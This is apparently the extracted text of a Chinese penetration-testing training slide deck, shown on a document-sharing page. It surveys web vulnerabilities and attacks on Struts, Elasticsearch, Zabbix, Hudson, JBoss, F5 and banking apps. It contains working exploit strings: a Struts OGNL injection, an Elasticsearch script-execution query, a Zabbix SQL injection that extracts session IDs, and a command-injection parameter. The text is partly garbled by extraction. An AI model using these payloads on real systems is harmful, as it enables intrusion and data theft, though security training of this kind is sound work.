信息安全技術培訓-滲透測試_第1頁
信息安全技術培訓-滲透測試_第2頁
信息安全技術培訓-滲透測試_第3頁
信息安全技術培訓-滲透測試_第4頁
信息安全技術培訓-滲透測試_第5頁
已閱讀5頁,還剩77頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

信息安全技術培訓-滲透測試第一頁,共82頁。信息安全技術培訓——滲透測試、演示

劉冬2015-3-28V1.0

第二頁,共82頁。什么是滲透測試應用程序滲透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)安全測試第三頁,共82頁。什么是滲透測試滲透測試(PenetrationTesting)

——是為了證明網(wǎng)絡防御按照預期計劃正常運行而提供的一種機制。實現(xiàn)原理:

依據(jù)

對已知或未知漏洞測試、模擬攻擊

目地

重點:降低風險、完善目前的安全策略

特點

人工檢測、工具掃描、可控非破壞第四頁,共82頁。什么是滲透測試滲透測試流程

第五頁,共82頁。滲透測試滲透測試工具

BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose第六頁,共82頁。什么是滲透測試應用程序滲透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)安全測試第七頁,共82頁?;赪eb滲透測試掃描解析輸入Web主機風險信息收集解析應用程序分析應用程序,會話機制、客戶端控件等SQL、XSS、RFI等測試代理、配置不當,中間件等識別分析與利用第八頁,共82頁。HackingOWASPTOP10注入漏洞跨站腳本失效的身份驗證和回話管理不安全的直接對象引用CSRF安全配置錯誤不安全的加密存儲沒有限制URL訪問傳輸層保護不足未驗證的重定向和轉發(fā)第九頁,共82頁。Hacking注入漏洞——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1

and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)第十頁,共82頁。Hacking注入漏洞——SQL注入事實上,對錯誤信息進行封裝并不一定能阻止攻擊者的入侵行為,封裝的錯誤信息,但是攻擊己經形成,有攻擊者能根據(jù)封裝的錯誤信息對攻擊結果進行判斷,繼續(xù)實施攻擊。其實盲注就是通過封裝的消息來收集攻擊過程中需要的信息。第十一頁,共82頁。Hacking注入漏洞——命令注入POST/aim/synRequest.doHTTP/1.1????method=trace_route&ip=&m=5&w=2|ifconfig12第十二頁,共82頁。Hacking跨站腳本存儲型反射型DOM型13第十三頁,共82頁。Hacking跨站腳本原理簡單,利用卻不簡單WEB2.0是XSS的新溫床XSS/CSRFWORM:Samyworm&Sinaweiboworm1、跨站URL:2、由JS發(fā)起CSRF:a、發(fā)微博b、加關注c、發(fā)私信AboutSamyWorm:/wiki/Samy_(XSS)http://namb.la/popular/14第十四頁,共82頁。Hacking任意文件讀取15第十五頁,共82頁。Hacking任意文件讀取16第十六頁,共82頁。Hacking任意文件讀取17第十七頁,共82頁。Hacking任意文件讀取18第十八頁,共82頁。Hacking任意文件讀取19第十九頁,共82頁。Hacking上傳漏洞——修改參數(shù)20第二十頁,共82頁。Hacking上傳漏洞——欺騙21第二十一頁,共82頁。Hacking上傳漏洞——APP客戶端22第二十二頁,共82頁。Hacking認證錯誤——原始信息的校驗方式1、不校驗——直接構造惡意數(shù)據(jù)修改密碼2、校驗COOKIE——CSRF23第二十三頁,共82頁。Hacking目錄遍歷——移動代理服務器第二十四頁,共82頁。Hacking錯誤信息——“友好”的返回信息25第二十五頁,共82頁。Hacking錯誤信息——HTTPFuzzing對錯誤信息的利用26第二十六頁,共82頁。Hacking參數(shù)錯誤——權限的鑒別http://site/d477340ffa28755c?OpenDocumenthttp://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocument第二十七頁,共82頁。Hacking參數(shù)錯誤——權限的鑒別http://site/download.asp?file=/path/down_file.rar第二十八頁,共82頁。Hacking參數(shù)錯誤——權限的鑒別http://site/download.asp?file=/path/down_file.rar第二十九頁,共82頁。Hacking邏輯錯誤一個密碼找回的邏輯錯誤獲取驗證碼為5為純數(shù)字,有效期為30分鐘,可以暴力破解。通過HTTPFUZZING獲得第三十頁,共82頁。Hacking邏輯錯誤第三十一頁,共82頁。Hacking邏輯錯誤一個密碼找回的邏輯錯誤第三十二頁,共82頁。Hacking邏輯錯誤修改任意賬號密碼第三十三頁,共82頁。什么是滲透測試應用程序滲透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)安全測試34第三十四頁,共82頁?;ヂ?lián)網(wǎng)攻擊常見的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss …第三十五頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示如何利用Struts進入你的服務器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}第三十六頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示37第三十七頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示夢網(wǎng)合作自助服務12590遠程代碼執(zhí)行38第三十八頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示移動學院39第三十九頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Heartbleed、1.0.1a、1.0.1b、1.0.1c、1.0.1d、、、等版本40第四十頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防SplunkXSSOpenSSLTLS心跳信息泄漏漏洞未授權訪問代碼執(zhí)行41第四十一頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Splunk代碼執(zhí)行42第四十二頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防SAP漏洞演示SAPNetWeaver是基于專業(yè)標準的集成化應用平臺,能夠大幅度降低系統(tǒng)整合的復雜性。其組件包括門戶、應用服務器、商務智能解決方案以及系統(tǒng)整合和數(shù)據(jù)整合技術。43第四十三頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Hadoop通過hadoop,hbase,hdfs0.2RC版本的管理web端能遠程執(zhí)行命令,通過該節(jié)點對集群服務器進行任務分發(fā)(該是基本功能,當然可以進行批量提權l(xiāng)inux主機)滲透進hadoop集群。44第四十四頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22\%22)%2b\%22-\%22%2bSystem.getProperty(\%22\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}45第四十五頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Zend,ThkphpZendframework讀取任意文件Demo選擇的原因:腳本小子只會讀取任意文件,高級黑客能拿來做什么?內網(wǎng)端口掃描內網(wǎng)服務器攻擊HTTP攻擊暴力破解46第四十六頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Cacti0day如何利用Cacti進入你的服務器0day47第四十七頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防ZabbixZabbix弱口令SQl注入httpmon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)第四十八頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Zenoss第四十九頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Hudson創(chuàng)建任務Buildamaven2projectBuild寫入execwinshellBuildnowhttp://ip:8080/Buildsconsole第五十頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防HudsonHiveHQL可以通過transform自定義Hive使用的Map/Reduce腳本,從而調用shell/python等語言,默認皆可用,導致攻擊者可以通過hive接口等相關操作方式直接獲取服務器權限。第五十一頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Jboss認證繞過控制臺密碼JMXinvokerServlet第五十二頁,共82頁?;ヂ?lián)網(wǎng)攻擊LDAP

53第五十三頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Rsync,NFSCMS生成html靜態(tài)文件通過rsync發(fā)布DemoNFS漏洞利用…54第五十四頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防VmwareVMwarevCenterOrchestrator在Web管理工具的實現(xiàn)上存在安全漏洞,可被利用泄露vCenter服務器密碼。55第五十五頁,共82頁?;ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防F5在多家銀行測試發(fā)現(xiàn),導致內網(wǎng)信息泄露第五十六頁,共82頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防F5登陸繞過驗證F5多種設備和9.x/10.x/11.x等多個版本的ssh登錄存在root帳號繞過驗證的重大漏洞第五十七頁,共82頁。什么是滲透測試應用程序滲透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)安全測試第五十八頁,共82頁。常見漏洞SQL注入Xss跨站腳本攻擊1元購買任意商品查看任意賬號支付額度修改任意用戶密碼轉賬漏洞查看任意賬號的賬戶金額查看任意用戶的身份信息短信炸彈……

這種可能性有多大?第五十九頁,共82頁。其他方向SSRF(服務端請求偽造)如果你的ERP有漏洞,并且存在一個XXE的漏洞那么它通過一個webservices來攻擊你的內部核心ERP.第六十頁,共82頁。其他方向SSRF(服務端請求偽造)ORACLEpeoplesoft環(huán)境克隆導致的問題ORACLEERP默認密碼ORACLEERP權限問題ORACLEERPiscript問題ORACLEERP中間件問題ORACLEERP數(shù)據(jù)庫問題第六十一頁,共82頁。其他方向Pentesting攻防HaddoopOpenstackSpringHibernateIbatisMongodb…第六十二頁,共82頁。其他方向設計缺陷弱口令未授權訪問敏感信息網(wǎng)絡滲透環(huán)境配置不合理致命危害權限繞過拓撲圖泄露識別分析與利用第六十三頁,共82頁。安全測試應用系統(tǒng)漏洞測試點--業(yè)務復雜容易產生業(yè)務的邏輯安全問題--問題ALL輸入測試測試方法:提交惡意參數(shù),觀察返回結果第六十四頁,共82頁。某商行網(wǎng)銀滲透測試結果第六十五頁,共82頁。某商行APP滲透測試結果第六十六頁,共82頁。權限控制漏洞最常見和最普遍的漏洞,重點測試通過越權的查詢操作可導致未授權的用戶直接訪問不應用訪問的資源,導致一些敏感信息的泄露,其中包括查詢其他賬戶余額查詢其他賬戶積分查詢其他賬戶身份信息查詢其他賬戶的其他相關信息安全測試第六十七頁,共82頁。安全測試應用系統(tǒng)漏洞測試點--安全控件測試使用ComRaider測試ActiveX控件安全密碼控件是否有防鍵盤記錄功能登錄點測試加密控件是否有對密碼進行加密企業(yè)網(wǎng)銀繞過key保護第六十八頁,共82頁。安全測試應用系統(tǒng)漏洞測試點數(shù)據(jù)校驗問題使用提交異常數(shù)據(jù)進行測試提交負數(shù)/超大轉賬金額提交負數(shù)/超大積分賬戶控制積分轉換輸入輸

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論